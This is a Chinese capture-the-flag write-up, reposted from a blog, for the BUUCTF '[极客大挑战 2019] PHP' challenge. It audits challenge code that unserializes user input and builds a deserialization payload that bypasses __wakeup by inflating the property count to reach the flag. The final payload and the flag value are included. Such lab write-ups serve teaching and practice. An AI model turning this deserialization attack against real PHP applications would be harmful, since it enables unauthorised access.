1.PHP-[极客大挑战 2019]-[传送门->BUUCTF]
第一步:打开题目环境,访问链接,发现页面提示有备份文件,我们通过目录扫描,发现了www.zip,下载袭来,发现其中有很多文件
第二步:代码审计:
index.php
<?php
include 'class.php'; //文件包含class.php
$select = $_GET['select']; //以GET形式读取select参数的值
$res=unserialize(@$select); //反序列化select参数,赋值给$res变量
?>
class.php
<?php
include 'flag.php'; //文件包含flag.php
error_reporting(0); //关闭错误报告
class Name{ //类:Name
private $username = 'nonono'; //私有属性:$username
private $password = 'yesyes'; //私有属性:$password
public function __construct($username,$password){//公有构造方法,在实例化当前类前,自动被调用
$this->username = $username; //$username属性初始化
$this->password = $password; //$password属性初始化
}
function __wakeup(){ //魔术方法__wakeup():反序列化当前类的实例化对象的时候,自动被调用
$this->username = 'guest'; //给$username属性赋值
}
function __destruct(){ //析构方法__destruct():在当前类的实例化对象销毁前,自动被调用
if ($this->password != 100) { //判断password是否弱不等于数值100
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') { //判断username是否全等于admin
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
第三步:思路
传入当前类的实例化对象:属性username===admin,属性password=100,并且绕过__wakeup()魔术方法,序列化后传入即可
第四步:编写代码,生成payload
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$chen = new Name('admin',100);
$chen = serialize($chen);
echo $chen."<br />";
//O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
$chen = str_replace(chr(00),'\00',$chen); #解决私有属性序列化后不可见字符串不可赋值的问题
echo $chen."<br />";
//O:4:"Name":2:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";i:100;}
$chen = str_replace('s:14:','S:14:',$chen); #解决私有属性序列化后不可见字符串不可赋值的问题
echo $chen."<br />";
//O:4:"Name":2:{S:14:"\00Name\00username";s:5:"admin";S:14:"\00Name\00password";i:100;}
$chen = str_replace('O:4:"Name":2:','O:4:"Name":3:',$chen); #绕过__wakeup()魔术方法
echo $chen."<br />";
//O:4:"Name":3:{S:14:"\00Name\00username";s:5:"admin";S:14:"\00Name\00password";i:100;}
payload:
?select=O:4:"Name":3:{S:14:"\00Name\00username";s:5:"admin";S:14:"\00Name\00password";i:100;}
第五步:提交payload,获得flag
图略 flag{38ab7815-1f86-4317-8468-e38a6de4e117}
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/110003000